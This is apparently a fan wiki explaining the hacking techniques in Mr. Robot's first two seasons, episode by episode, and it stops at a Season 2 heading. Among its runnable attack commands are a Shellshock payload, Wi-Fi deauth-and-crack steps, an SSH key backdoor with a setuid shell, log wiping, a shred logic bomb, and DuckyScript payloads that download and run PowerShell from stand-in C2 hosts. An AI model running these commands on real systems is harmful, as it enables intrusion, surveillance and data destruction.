MR. ROBOT HACKING WIKI

A comprehensive technical breakdown of every hack, exploit, and attack technique depicted in the critically acclaimed series Mr. Robot (2015-2019). Every tool is real. Every technique is accurate.

4Seasons
45Episodes
100+Techniques
50+Real Tools
Filters: Tools Attacks Social Eng. Hardware MITRE ATT&CK S1 S2 S3 S4

// SEASON 1

The revolution begins. Elliot Alderson, a cybersecurity engineer by day and vigilante hacker by night, is recruited by the mysterious Mr. Robot to join fsociety and take down E Corp. 10 episodes of meticulously accurate hacking.

01

Hello, Friend

eps1.0_hellofriend.mov
+
Tor Hashcat RUDY DDoS Rootkit

Hacks & Techniques

1. Tor Exit Node Traffic Analysis

Elliot identifies Ron, a coffee shop owner, as hosting child exploitation material. He accomplishes this by running a Tor exit node, which allows him to observe unencrypted traffic leaving the Tor network. While Tor protects the source IP address through onion routing (multiple encrypted relays), the final hop -- the exit node -- can see unencrypted (non-HTTPS) traffic in plaintext.

  • Tor Architecture: Client → Guard Node → Middle Relay → Exit Node → Destination
  • Vulnerability: Exit node operators can sniff unencrypted traffic (HTTP, FTP, SMTP)
  • Tools: Tor, tcpdump, Wireshark for packet capture at exit node
Dan Egerstad demonstrated this in 2007 by running Tor exit nodes and capturing embassy email credentials. This is a well-known limitation of Tor -- it provides anonymity, not encryption of the final hop.
2. Password Cracking via OSINT-Driven Dictionary Attack

Elliot cracks Ron's password by first performing social media reconnaissance to gather personal information (pet names, birthdays, favorite bands), then generating a targeted wordlist. The password was based on a pet's name -- a common weak password pattern.

  • OSINT Gathering: Facebook, Instagram, public records for personal details
  • Wordlist Generation: Tools like CUPP (Common User Passwords Profiler) or CeWL
  • Cracking: Hashcat or John the Ripper for offline hash cracking
  • Attack Type: Dictionary attack with rule-based mutations (l33tspeak, appended numbers)
# Generate targeted wordlist from social media cupp -i # Interactive mode - enter target's personal info # Crack password hash with generated wordlist hashcat -m 0 -a 0 hash.txt custom_wordlist.txt -r rules/best64.rule john --wordlist=custom_wordlist.txt hash.txt
3. RUDY (R-U-Dead-Yet) DDoS Attack on E Corp

Allsafe detects a massive Layer 7 (Application Layer) DDoS attack against E Corp using the RUDY technique. RUDY sends HTTP POST requests with an abnormally long Content-Length header, then transmits the body at an extremely slow rate (one byte at a time), keeping connections open and exhausting server resources.

  • Attack Type: Slow HTTP POST (application layer DDoS)
  • Mechanism: Long Content-Length header + extremely slow body transmission
  • Similar Tools: SlowLoris (slow headers), Slow Read (small TCP window)
  • Impact: Exhausts server thread pool without requiring massive bandwidth
RUDY is a real open-source tool. Slow HTTP attacks are effective because they require minimal bandwidth from the attacker while consuming maximum server resources. Cloudflare, Akamai, and other CDNs specifically protect against this class of attack.
4. Rootkit Discovery on E Corp Servers

Elliot discovers a rootkit disguised as a DAT file on E Corp's servers during the DDoS incident response. The rootkit hooks into the kernel, hiding its presence from standard monitoring tools while maintaining persistent backdoor access.

  • Rootkit Type: Linux kernel-level rootkit with process/file hiding capabilities
  • Detection Method: Manual process analysis, checking for hidden network connections
  • C2 Channel: The rootkit phones home to a command-and-control server
# Commands Elliot uses to investigate ps aux | grep suspicious_process netstat -tulpn # Check for hidden network connections ls -la /tmp/.hidden/ # Look for hidden directories strings malware.dat # Extract readable strings from binary lsof -i :4444 # Check for reverse shell connections
5. Anonymous Communication Infrastructure

Elliot uses multiple layers of anonymization for his activities:

  • Tor Browser: For anonymous web browsing
  • IRC over Tor: Internet Relay Chat through hidden services for group communication
  • VPN + Tor: Layered anonymization (VPN to hide Tor usage from ISP)
  • ProtonMail: End-to-end encrypted email service based in Switzerland

Tools Used

Kali Linux Tor Hashcat John the Ripper CUPP Wireshark RUDY ProtonMail IRC
02

Ones and Zer0es

eps1.1_ones-and-zer0es.mpeg
+
Shellshock Bluetooth DeepSound

Hacks & Techniques

1. Shellshock Vulnerability (CVE-2014-6271)

The episode references the Shellshock vulnerability, a critical bug in the GNU Bash shell that allows remote code execution through crafted environment variables. Discovered in 2014, it affected millions of servers running CGI scripts, DHCP clients, and SSH with ForceCommand.

  • CVE: CVE-2014-6271 (and related CVE-2014-7169)
  • Vector: Maliciously crafted environment variables passed to Bash
  • Impact: Remote Code Execution (RCE) on vulnerable web servers
# Shellshock exploit example via CGI curl -H "User-Agent: () { :; }; /bin/bash -c 'cat /etc/passwd'" http://target/cgi-bin/vuln.cgi # Testing for Shellshock vulnerability env x='() { :;}; echo vulnerable' bash -c "echo test"
2. Bluetooth Exploitation of Tyrell Wellick's Phone

Elliot exploits a Bluetooth vulnerability on Tyrell Wellick's Android phone to gain unauthorized access. Using Kali Linux Bluetooth tools, he scans for discoverable devices and exploits the connection.

  • Bluesnarfing: Unauthorized access to data on Bluetooth devices
  • Bluebugging: Taking control of a phone via Bluetooth
  • Tools: btscanner, hcitool, hciconfig, bluesnarfer
# Scan for Bluetooth devices hcitool scan btscanner # Enumerate services on target device sdptool browse XX:XX:XX:XX:XX:XX # Bluesnarfing attack bluesnarfer -r 1-100 -b XX:XX:XX:XX:XX:XX
BlueBorne (2017) later demonstrated that Bluetooth attacks remain critically viable, affecting 5.3 billion devices across Android, iOS, Windows, and Linux. Armis Labs disclosed 8 zero-day vulnerabilities in Bluetooth implementations.
3. Steel Mountain Reconnaissance

fsociety begins planning the attack on Steel Mountain, E Corp's physical data center where backup tapes (LTO - Linear Tape-Open) are stored. The reconnaissance focuses on the facility's HVAC systems as the attack vector.

  • Target: HVAC/environmental control systems
  • Goal: Raise temperature to destroy magnetic backup tapes
  • Recon: Facility blueprints, employee social media, physical surveillance
4. DeepSound Steganography

Elliot uses DeepSound to hide stolen data inside audio CD files. Instead of storing evidence on encrypted drives (which could raise suspicion), he embeds data within WAV/FLAC audio files that play normally but contain hidden encrypted payloads.

  • Tool: DeepSound by jpinsoft (real software)
  • Supported Formats: WAV, FLAC, WMA, APE
  • Encryption: AES-256 encryption of the hidden payload
  • Advantage: Audio files play normally; hidden data is undetectable without the tool
03

Debug

eps1.2_d3bug.mkv
+
RAT Android Exploit DeepSound

Hacks & Techniques

1. Fernando Vera Surveillance & Digital Investigation

Elliot investigates drug dealer Fernando Vera by performing comprehensive OSINT (Open Source Intelligence) reconnaissance, email compromise, and social network analysis to map Vera's criminal operation.

  • Email Analysis: Compromising email accounts to read communications
  • Social Network Mapping: Identifying associates, suppliers, and customers
  • Public Records: Court records, property databases, phone listings
  • EXIF Data: Extracting geolocation from photos posted online
2. Rootkit C2 Infrastructure Discovery

Elliot continues reverse-engineering the rootkit discovered on E Corp's servers, uncovering its command-and-control (C2) communication infrastructure. This reveals the rootkit is part of a larger, coordinated attack plan.

  • Static Analysis: Disassembling the binary without executing it (IDA Pro, Ghidra, radare2)
  • Dynamic Analysis: Running in a sandbox to observe behavior
  • Network Analysis: Identifying C2 server addresses, communication protocols
  • Indicators of Compromise (IOCs): IP addresses, domain names, file hashes
3. Android Phone Rooting & Spyware

The episode explores mobile device exploitation, including rooting Android phones to install surveillance applications that provide complete access to calls, messages, GPS location, camera, and microphone.

  • Rooting Tools: SuperSU for privilege escalation on Android
  • Spyware: FlexiSPY, Highster Mobile, Spyera (commercial surveillance tools)
  • Capabilities: Call recording, SMS interception, GPS tracking, camera/mic activation
  • Stealth: Applications hide from app drawer and run as system services
04

Daemons

eps1.3_da3m0ns.mp4
+
Raspberry Pi Femtocell USB Rubber Ducky SCADA/ICS

Hacks & Techniques

1. Steel Mountain Social Engineering Infiltration

Elliot physically infiltrates the Steel Mountain data center by impersonating "Sam Sepiol", a field technician from a fake company called BansheeNet. He creates a complete pretext identity including a fake website, business cards, and employee badge.

  • Pretext Creation: Fake company website (BansheeNet), fabricated employee badge
  • Identity Research: Studying real technician behavior, dress codes, procedures
  • Confidence Exploitation: Acting as if he belongs, using authority and technical jargon
  • Physical Bypass: Tailgating through secure doors, bypassing visitor protocols
This mirrors real-world physical penetration testing. Coalfire testers were famously arrested in Iowa (2019) during a legitimate physical pen test of a courthouse. Social engineering with pretext identities has a remarkably high success rate in professional red team engagements.
2. Raspberry Pi Drop Box Implant

Elliot plants a Raspberry Pi device behind a thermostat/HVAC panel at Steel Mountain. The device is configured with a cellular modem (3G/4G) for out-of-band communication, bypassing the facility's network monitoring entirely. Once connected, it provides remote access to the Building Management System (BMS) controlling the HVAC.

  • Hardware: Raspberry Pi + 3G/4G cellular modem + battery backup
  • Communication: Reverse SSH tunnel over cellular to fsociety's C2 server
  • Target: BACnet/Modbus protocols controlling HVAC systems
  • Concealment: Small form factor hidden behind physical infrastructure
# Raspberry Pi reverse SSH tunnel (auto-reconnecting) autossh -M 0 -N -R 2222:localhost:22 user@c2server.onion \ -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" # Once connected, access HVAC via BACnet python3 bacnet_scan.py --target 192.168.1.0/24 python3 bacnet_write.py --device HVAC01 --property temperature --value 99
Commercial versions exist: the Pwn Plug by Pwnie Express is a professional drop box for penetration testing. Raspberry Pi-based implants are commonly used in red team operations, often with LTE modems for out-of-band C2.
3. Femtocell Exploitation

The team uses a modified femtocell (small cellular base station) to intercept cellular communications near Steel Mountain. The femtocell is reflashed with custom firmware to act as a rogue base station (IMSI catcher).

  • Hardware: Commercial femtocell (e.g., Verizon Network Extender) with modified firmware
  • Software: OpenBTS or OsmocomBB for GSM stack
  • Capabilities: Intercept calls, SMS, and data from nearby phones
  • Principle: Phones connect to strongest signal -- rogue tower overpowers legitimate ones
Demonstrated at DEF CON 21 (2013) by iSEC Partners (now NCC Group). Doug DePerry and Tom Ritter showed complete voice and data interception through a hacked Verizon femtocell costing ~$250.
4. USB Rubber Ducky Parking Lot Drop

Darlene drops USB Rubber Ducky devices in the Steel Mountain parking lot, relying on employee curiosity to plug them into workstations. The USB Rubber Ducky appears as a normal flash drive but registers as a HID (Human Interface Device) keyboard, executing pre-programmed keystroke payloads at superhuman speed.

  • Hardware: Hak5 USB Rubber Ducky (~$50)
  • Microcontroller: Atmel AT32UC3B1256
  • Payload Language: DuckyScript
  • Execution Time: Full payload in 3-15 seconds
# DuckyScript payload example - opens reverse shell DELAY 1000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://c2server/payload.ps1')" ENTER DELAY 1000 STRING exit ENTER
Studies show 45-98% of dropped USB drives get plugged in. The US DHS conducted experiments confirming this. USB drop attacks remain one of the most effective physical social engineering vectors.
05

Exploits

eps1.4_3xpl0its.wmv
+
HVAC Hack BACnet RFID Cloning Privilege Escalation

Hacks & Techniques

1. Steel Mountain HVAC System Compromise

The Raspberry Pi implant activates and fsociety remotely accesses Steel Mountain's Building Management System (BMS). They manipulate the HVAC controllers to raise the temperature, destroying the magnetic LTO backup tapes stored in the facility.

  • Protocol: BACnet (Building Automation and Control Network) -- often runs without authentication
  • Target: Tridium Niagara Framework controllers (real-world vulnerable BMS platform)
  • Attack: Overriding temperature setpoints to exceed tape storage safe limits
  • Impact: Magnetic tape degradation begins at ~100°F (38°C); data loss at ~125°F (52°C)
Billy Rios and Terry McCorkle demonstrated critical vulnerabilities in Tridium Niagara controllers at Kaspersky's Security Analyst Summit. Over 21,000 Niagara systems were found exposed to the internet. The 2013 Target breach also began with compromised HVAC vendor credentials.
2. Linux Privilege Escalation

Elliot needs to escalate privileges on compromised systems to execute the attack chain. Several techniques are referenced:

  • Kernel Exploits: Dirty COW (CVE-2016-5195), similar local privilege escalation vulns
  • SUID Binaries: Finding misconfigured SUID root binaries
  • Cron Jobs: Writable cron scripts running as root
  • Weak Permissions: World-writable /etc/passwd or shadow files
# Enumeration for privilege escalation find / -perm -4000 -type f 2>/dev/null # Find SUID binaries cat /etc/crontab # Check cron jobs ls -la /etc/passwd /etc/shadow # Check permissions uname -a # Kernel version for exploit matching python linux-exploit-suggester.py
3. RFID Badge Cloning

Physical access to secure areas involves cloning RFID access badges using specialized hardware:

  • Tastic RFID Thief: Long-range RFID reader that can capture badge data from several feet away
  • GeZhi HID Cloner: Portable device for cloning HID proximity cards
  • Attack Range: Can read badges from 3+ feet, even through clothing or bags
  • Target: HID 125kHz proximity cards (extremely common in corporate environments)
06

Brave Traveler

eps1.5_br4ve-trave1er.asf
+
Prison Network Hack Proxychains Tor

Hacks & Techniques

1. Prison Network Exploitation

Elliot hacks into the prison system to arrange Fernando Vera's release. He compromises the correctional facility's network, which runs outdated systems with known vulnerabilities, to manipulate records and security systems.

  • Target: Correctional facility inmate management system
  • Likely Vector: SQL injection on web-facing applications, or exploitation of unpatched systems
  • Goal: Manipulate records, access control systems, or release procedures
2. Multi-Layer Network Obfuscation

Elliot chains multiple anonymization layers to hide the attack's origin:

  • VPN Chain: Multiple VPN servers in different jurisdictions
  • Tor: Onion routing through 3+ relays
  • SSH Tunnels: Encrypted tunnels through compromised servers
  • Proxychains: Routing tools through SOCKS4/5 proxy chains
# Proxychains configuration for multi-hop anonymization # /etc/proxychains.conf dynamic_chain proxy_dns socks5 127.0.0.1 9050 # Tor SOCKS proxy socks5 proxy1.example 1080 socks5 proxy2.example 1080 # Route nmap through proxy chain proxychains nmap -sT -Pn target_ip
3. Printer Exploitation & Tracking Dots

The episode references printer security vulnerabilities and the existence of Machine Identification Codes (MICs) -- tiny yellow dots printed by color laser printers that encode the printer's serial number, date, and time.

  • PRET: Printer Exploitation Toolkit for attacking network printers
  • Tracking Dots: Nearly invisible yellow dots that identify the source printer
  • Vulnerabilities: PJL/PS language injection, LDAP credential theft, print job interception
07

View Source

eps1.6_v1ew-s0urce.flv
+
SSH Backdoor Android RAT Wi-Fi Cracking aircrack-ng

Hacks & Techniques

1. Tyrell Wellick's SSH Backdoor

Tyrell installs a persistent SSH backdoor on E Corp's servers, leveraging his executive position (Senior VP of Technology) for insider access. He modifies SSH configuration to accept his key, creating a hidden administrative channel.

# Adding unauthorized SSH key for persistent access echo "ssh-rsa AAAA...tyrell@ecorp" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys # Alternatively, modifying PAM for backdoor authentication # Or planting a setuid root shell cp /bin/bash /tmp/.hidden_shell chmod u+s /tmp/.hidden_shell
2. Android Phone Exploitation via Physical Access

Tyrell gains brief physical access to an executive's phone and installs a Remote Access Trojan (RAT). With an unlocked Android device, installing a monitoring APK takes seconds.

  • Method: ADB (Android Debug Bridge) sideloading or direct APK installation
  • RAT: AndroRAT or similar Android remote access tool
  • Capabilities: Full device control -- camera, microphone, GPS, SMS, calls, files
  • Stealth: App hides from launcher, runs as background service
3. WPA2 Wi-Fi Cracking

Wi-Fi network attacks using the aircrack-ng suite to capture and crack WPA2 handshakes:

# Put wireless adapter in monitor mode airmon-ng start wlan0 # Scan for networks airodump-ng wlan0mon # Capture WPA2 handshake (target specific network) airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauthenticate client to force reconnection/handshake aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon # Crack captured handshake aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # Alternative: automated with wifite wifite --wpa --dict /usr/share/wordlists/rockyou.txt
4. Elliot's Self-Forensics

Elliot discovers he may be compromised and performs forensic analysis on his own systems, checking for signs of intrusion:

# Check for suspicious network connections netstat -tulpn | grep ESTABLISHED ss -tulpn lsof -i -P -n # Check for suspicious processes ps aux --sort=-%mem | head -20 top -bn1 # Check for unauthorized cron jobs crontab -l ls -la /etc/cron.* # Check SSH authorized keys cat ~/.ssh/authorized_keys cat /root/.ssh/authorized_keys # Check for modified system binaries debsums -c 2>/dev/null # Debian/Ubuntu rpm -Va 2>/dev/null # RHEL/CentOS
08

Whiterose

eps1.7_wh1ter0se.m4v
+
IRC + OTR Tor Hidden Services Coordinated Attack

Hacks & Techniques

1. Dark Army Coordination via Encrypted IRC

fsociety coordinates with the Chinese hacking group Dark Army using IRC (Internet Relay Chat) hosted on Tor hidden services with OTR (Off-the-Record) encryption for end-to-end message security.

  • IRC Server: Hosted as Tor hidden service (.onion address)
  • Encryption: OTR provides forward secrecy and deniability
  • OPSEC: No logging, auto-expiring messages, identity verification via fingerprints
2. Time-Synchronized Multi-Location Attack

The attack requires precise timing coordination between fsociety (New York) and Dark Army (China) to simultaneously compromise E Corp's distributed infrastructure across multiple data centers.

  • Challenge: Attacking replicated systems requires simultaneous execution
  • Technique: NTP-synchronized attack triggers with pre-agreed time windows
  • OPSEC: Limited communication windows to minimize exposure
Coordinated multi-location attacks are characteristic of APT operations. The 2013 South Korea banking attack simultaneously wiped systems across multiple financial institutions at a pre-set time, demonstrating this methodology in practice.
3. Whiterose's Social Engineering Mastery

Whiterose demonstrates advanced psychological manipulation -- studying targets' emotional vulnerabilities, personal histories, and psychological profiles to gain compliance. This represents the highest level of social engineering: manipulating beliefs and motivations rather than simply extracting information.

09

Mirroring

eps1.8_m1rr0r1ng.qt
+
AES-256 Encryption Cryptoworm Metasploit Python

Hacks & Techniques

1. E Corp Financial System Architecture Mapping

fsociety maps E Corp's complete data architecture to ensure the attack destroys all copies of financial records -- primary data centers, backup tapes (Steel Mountain), offsite replication (China), and disaster recovery sites.

  • Primary Systems: Live databases and application servers
  • Backup Tapes: LTO tapes at Steel Mountain (already compromised via HVAC)
  • Offsite Replication: Chinese data center (Dark Army handles this)
  • DR Sites: Disaster recovery infrastructure
2. Custom Cryptoworm Development

Darlene develops the custom malware (cryptoworm) that will encrypt E Corp's financial data using AES-256 encryption. The worm must propagate across the network, identify target databases, encrypt records, and securely delete the originals.

  • Encryption: AES-256 (symmetric key encryption -- computationally infeasible to brute force)
  • Propagation: Self-replicating worm spreading via network shares, SSH, and exploits
  • Key Management: Encryption keys are designed to be destroyed after the attack
  • Languages: Python for rapid development, C/C++ for performance-critical components
# Simplified encryption logic (Python pseudocode) from Crypto.Cipher import AES from Crypto.Random import get_random_bytes import os key = get_random_bytes(32) # AES-256 key iv = get_random_bytes(16) # Initialization vector cipher = AES.new(key, AES.MODE_CBC, iv) # Encrypt target financial database files # Securely overwrite originals with random data # Destroy encryption key after completion
This attack predated WannaCry (2017) and NotPetya (2017) by two years, making the show remarkably prescient. NotPetya caused ~$10 billion in damage using similar techniques -- it masqueraded as ransomware but was actually a destructive wiper with no real decryption mechanism.
10

Zero Day

eps1.9_zer0-day.avi
+
The 5/9 Hack Data Destruction Anti-Forensics AES-256

Hacks & Techniques

1. The 5/9 Hack -- E Corp Data Destruction

fsociety executes the final coordinated attack, encrypting and destroying all of E Corp's financial records across every redundant copy. This is essentially a sophisticated, multi-vector, targeted ransomware attack without the ransom -- pure destruction.

  • Attack Chain:
    • Step 1: Compromised insider access (Tyrell's backdoor)
    • Step 2: Physical destruction of backup tapes (HVAC attack at Steel Mountain)
    • Step 3: Dark Army compromises Chinese data center simultaneously
    • Step 4: Cryptoworm encrypts all live financial data with AES-256
    • Step 5: Encryption keys are securely destroyed
  • Result: 70% of global consumer debt records destroyed
Parallels: Sony Pictures Hack (2014) -- destructive attack wiping corporate data. Saudi Aramco/Shamoon (2012) -- wiped 35,000 workstations. NotPetya (2017) -- disguised as ransomware, caused ~$10B damage. The show aired in 2015 and was remarkably prescient about the ransomware epidemic that followed.
2. Anti-Forensics & Evidence Destruction

fsociety implements comprehensive anti-forensics measures to prevent attribution:

# Secure file deletion (multi-pass overwrite) shred -vfz -n 5 /path/to/evidence # Clear bash history history -c rm -f ~/.bash_history ln -sf /dev/null ~/.bash_history # Clear system logs echo "" > /var/log/auth.log echo "" > /var/log/syslog echo "" > /var/log/kern.log # Timestomping (modify file timestamps) touch -t 202001010000 /path/to/file # Secure memory wipe dd if=/dev/urandom of=/dev/sda bs=1M count=1024
3. Tyrell's Persistent Root Backdoor

Tyrell has maintained a root-level persistent backdoor on E Corp's systems through multiple methods:

  • Trojaned SSH: Modified SSH binary that accepts a hardcoded password
  • Kernel Module Rootkit: Loadable kernel module (LKM) hiding processes and files
  • Modified Init Scripts: Backdoor launched at every system boot
  • PAM Backdoor: Modified Pluggable Authentication Module accepting master password

// SEASON 2

The aftermath of the 5/9 hack. As the world reels from the financial collapse, fsociety plans their next move against the FBI investigation. Features the iconic femtocell hack and USB Rubber Ducky attack on the FBI.

01

Unmask

eps2.0_unm4sk-pt1.tc & eps2.0_unm4sk-pt2.tc
+
IoT Hacking Smart Home Takeover Femtocell

Hacks & Techniques

1. Smart Home / IoT Takeover (Susan Jacobs' House)

Darlene and fsociety compromise the entire smart home automation system of E Corp general counsel Susan Jacobs. They manipulate IoT devices to make the house uninhabitable, forcing Susan out so fsociety can use it as their base of operations.

  • Thermostat Control: Setting extreme temperatures to make the house uncomfortable
  • Audio System: Playing loud music at maximum volume at all hours
  • Alarm System: Repeatedly triggering the security alarm
  • Smart Shower: Manipulating water temperature controls
  • Attack Vector: Compromised centralized home automation hub (Crestron/Control4-like system)
  • Entry Point: Default credentials on IoT devices, UPnP/SSDP protocol exploitation
# IoT device enumeration on home network nmap -sV -p 1-65535 192.168.1.0/24 # Many IoT hubs expose REST APIs without authentication curl http://192.168.1.100:8080/api/thermostat/setpoint -X POST -d '{"temp":99}' curl http://192.168.1.100:8080/api/alarm/trigger -X POST
IoT devices are notoriously insecure. Rapid7 research demonstrated mass compromise of smart thermostats, Hue lights, and home automation controllers. The Mirai botnet (2016) exploited default credentials on hundreds of thousands of IoT devices.
2. Femtocell Planning

Darlene begins planning the construction of a modified femtocell to intercept FBI cellular communications. This sets up the season's primary technical operation.

  • Concept: Small cellular base station modified to act as a rogue cell tower
  • Target: FBI agents' cellular phones at the E Corp field office
  • Goal: Intercept calls, SMS, and data to monitor the FBI investigation
02

Kernel Panic

eps2.1_k3rnel-pan1c.ksd
+
Kernel Panic Tor Hidden Service Bitcoin

Hacks & Techniques

1. Ray's Dark Web Marketplace

Elliot discovers that Ray operates a dark web marketplace similar to Silk Road, running as a Tor hidden service. The marketplace facilitates illegal trade using cryptocurrency for payments and PGP for encrypted communications.

  • Platform: Tor hidden service (.onion address)
  • Payments: Bitcoin with tumbling/mixing for anonymity
  • Communications: PGP/GPG encryption for buyer-seller messages
  • Goods: Drugs, weapons, stolen data, human trafficking
# Tor hidden service configuration (/etc/tor/torrc) HiddenServiceDir /var/lib/tor/marketplace/ HiddenServicePort 80 127.0.0.1:8080 HiddenServicePort 443 127.0.0.1:8443 # After starting Tor, the .onion address is generated at: cat /var/lib/tor/marketplace/hostname
The real Silk Road was operated by Ross Ulbricht (Dread Pirate Roberts) and taken down by the FBI in 2013. The FBI used a combination of CAPTCHA leaks, server misconfiguration, and undercover operations to identify the server's real IP address.
2. Kernel Panic Concept

The episode title references a kernel panic -- an unrecoverable fatal error in the Unix/Linux kernel. When the kernel detects an internal error it cannot safely recover from, it halts the system to prevent data corruption. The equivalent in Windows is the Blue Screen of Death (BSOD).

  • Causes: Hardware failure, corrupt kernel modules, driver bugs, out-of-memory conditions
  • Diagnostic: dmesg, /var/log/kern.log, kernel crash dumps
03

Init 1

eps2.2_init_1.asec
+
Single-User Mode mysqldump Tor

Hacks & Techniques

1. Dark Web Site Migration

Elliot is coerced into migrating Ray's dark web marketplace to a new server. This involves database migration, web application deployment, and Tor hidden service reconfiguration.

# Database backup and migration mysqldump -u root -p --all-databases > marketplace_backup.sql scp marketplace_backup.sql user@newserver:/backup/ mysql -u root -p < marketplace_backup.sql # Web application file transfer rsync -avz --progress /var/www/marketplace/ user@newserver:/var/www/marketplace/ # Tor hidden service migration - copy keys for same .onion address scp /var/lib/tor/marketplace/hs_ed25519_secret_key user@newserver:/var/lib/tor/marketplace/ # Reconfigure torrc on new server HiddenServiceDir /var/lib/tor/marketplace/ HiddenServicePort 80 127.0.0.1:80
2. Linux Single-User Mode (init 1)

The title references init 1, which boots Linux into single-user/rescue mode with root access and minimal services. This is a physical access attack vector -- anyone with console access can reboot into init 1 and gain root without a password.

# Enter single-user mode init 1 # SysVinit telinit 1 # Alternative SysVinit systemctl isolate rescue.target # systemd equivalent # At GRUB: edit kernel parameters, append 'single' or 'init=/bin/bash'
04

Logic Bomb

eps2.3_logic-b0mb.hc
+
Logic Bomb Femtocell SDR OpenBTS

Hacks & Techniques

1. Logic Bomb

A logic bomb is malicious code inserted into a system that remains dormant until specific trigger conditions are met (a date, time, user action, or system event). Unlike a virus or worm, it does not self-replicate -- it simply waits and executes.

# Logic bomb example (simplified) import datetime, os, subprocess TRIGGER_DATE = datetime.datetime(2015, 5, 9, 0, 0, 0) while True: if datetime.datetime.now() >= TRIGGER_DATE: # Execute destructive payload subprocess.call(['shred', '-vfz', '-n', '5', '/critical/data']) break time.sleep(60)
The 2013 South Korea banking attack used logic bombs timed to detonate simultaneously across multiple financial institutions, wiping master boot records and destroying data at a pre-set time. Logic bombs have been used by disgruntled employees (e.g., the Omega Engineering case, 2000).
2. Femtocell Construction

Darlene continues building the rogue femtocell for the FBI operation, using hardware and software components to create an IMSI catcher:

  • Hardware: Commercial femtocell unit with custom firmware, SDR (Software Defined Radio)
  • Software: OpenBTS, OsmocomBB, or YateBTS for GSM stack implementation
  • IMSI Capture: Reads the International Mobile Subscriber Identity from target phones
  • Principle: Phones connect to the strongest signal -- the rogue tower overpowers legitimate towers
05

Master-Slave

eps2.4_m4ster-s1ave.aes
+
AES Encryption Database Replication

Hacks & Techniques

1. AES Encryption & Cryptographic Concepts

The .aes extension references the Advanced Encryption Standard, the encryption algorithm at the core of the 5/9 hack. AES-256 is the strongest variant, using a 256-bit key with 14 rounds of substitution-permutation operations.

  • AES-256-CBC: Cipher Block Chaining mode, requires IV (Initialization Vector)
  • AES-256-GCM: Galois/Counter Mode, provides authenticated encryption (integrity + confidentiality)
  • Key Space: 2^256 possible keys -- brute force is computationally infeasible
2. Master-Slave Database Architecture

The title references database replication architecture (now called primary-replica) where one node handles writes and others handle reads. Understanding this architecture is critical for attacking data at rest -- you must compromise all replicas.

06

Handshake

eps2.5_h4ndshake.sme
+
Handshake Protocols Tor

Hacks & Techniques

1. Handshake Protocols

The episode explores various handshake mechanisms critical to network security:

  • TCP Three-Way Handshake: SYN → SYN-ACK → ACK (connection establishment)
  • TLS/SSL Handshake: Certificate exchange, key negotiation, cipher suite selection
  • WPA Four-Way Handshake: The handshake that can be captured and cracked offline
2. Anonymous Tip to FBI (Ray's Dark Web Site)

Elliot anonymously reports Ray's dark web marketplace to law enforcement using privacy tools to prevent attribution:

  • Tor Browser: Anonymous web access
  • Guerrilla Mail / ProtonMail: Anonymous email services
  • FBI De-anonymization: Network Investigative Techniques (NITs), traffic correlation, server exploitation
The FBI used a Network Investigative Technique (NIT) -- essentially a browser exploit deployed from a compromised Tor hidden service -- to de-anonymize visitors of the Playpen child abuse site in Operation Pacifier (2015).
3. Prison Reveal

The revelation that Elliot has been in prison reframes all earlier hacking scenes. Ray was a corrupt prison official, and the "website migration" occurred on prison computers -- demonstrating that hacking can happen even in the most controlled environments.

07

Successor

eps2.6_succ3ss0r.p12
+
PKCS#12 OpenSSL

Hacks & Techniques

1. PKCS#12 Certificate Files

The .p12 extension references the PKCS#12 format, which bundles a certificate with its private key in a password-protected container. Used for client authentication, code signing, and S/MIME email encryption.

# Create a PKCS#12 file openssl pkcs12 -export -out cert.p12 -inkey private.key -in certificate.crt -certfile ca-chain.crt # Extract certificate and key from .p12 openssl pkcs12 -in cert.p12 -out cert.pem -nodes openssl pkcs12 -in cert.p12 -nocerts -out private.key openssl pkcs12 -in cert.p12 -clcerts -nokeys -out certificate.crt
2. Operational Security (OPSEC) Compartmentalization

With Elliot in prison, Darlene takes leadership of fsociety, applying strict compartmentalization -- each member knows only their specific task, not the full plan. This is a core OPSEC principle borrowed from intelligence tradecraft.

08

Init 5

eps2.7_init_5.fve
+
Femtocell USB Rubber Ducky IMSI Catcher Reverse Shell

Hacks & Techniques

1. THE FBI FEMTOCELL + RUBBER DUCKY HACK (Season Centerpiece)

This is the most important hack of Season 2. Angela plants a modified femtocell and a USB Rubber Ducky inside the FBI's temporary field office at E Corp headquarters.

Phase 1: Femtocell Hardware Preparation

The commercial femtocell is reflashed with custom firmware to act as a rogue cellular base station (IMSI catcher). It mimics a legitimate cell tower with a stronger signal, forcing nearby phones to connect.

  • Base Hardware: Verizon Network Extender or similar commercial femtocell
  • Firmware: Custom build using OpenBTS/OsmocomBB GSM stack
  • Signal Strength: Overpowers legitimate towers, forcing phone connections
  • Capabilities: Voice call interception, SMS interception, data interception, location tracking
Phase 2: USB Rubber Ducky Payload

The Hak5 USB Rubber Ducky is programmed with a DuckyScript payload that opens a reverse shell on the FBI agent's Windows workstation. It executes in seconds, appearing as a normal USB drive.

# DuckyScript payload for FBI workstation DELAY 1000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://fsociety-c2.onion/payload.ps1')" ENTER DELAY 2000 # The PowerShell payload establishes a reverse Meterpreter shell # providing full remote access to the FBI workstation
Phase 3: Angela's Social Engineering

Angela gains physical access to the FBI floor using her E Corp employee credentials combined with social engineering techniques:

  • Pretexting: Fabricating a legitimate reason to be on the FBI floor
  • Tailgating: Following authorized FBI personnel through secured doors
  • Confidence: Acting as if she belongs, using her E Corp badge for plausibility
  • Timing: Executing during a narrow window of opportunity
Phase 4: Femtocell Deployment & Interception

Angela hides the femtocell device inside the FBI office. FBI agents' phones automatically connect to it because it presents the strongest signal. All cellular communications are now routed through fsociety's rogue infrastructure.

  • Voice Calls: Recorded and forwarded to fsociety
  • SMS Messages: Intercepted in real-time
  • Mobile Data: Captured and analyzed
  • Location Data: FBI agent locations tracked via cell tower triangulation
DEF CON 21 (2013): Doug DePerry and Tom Ritter from iSEC Partners demonstrated complete voice and data interception through a hacked Verizon femtocell. The hardware cost ~$250 and the attack was devastatingly effective. Law enforcement itself uses similar devices (Stingray/IMSI catchers) for surveillance.
Phase 5: Network Compromise via Rubber Ducky

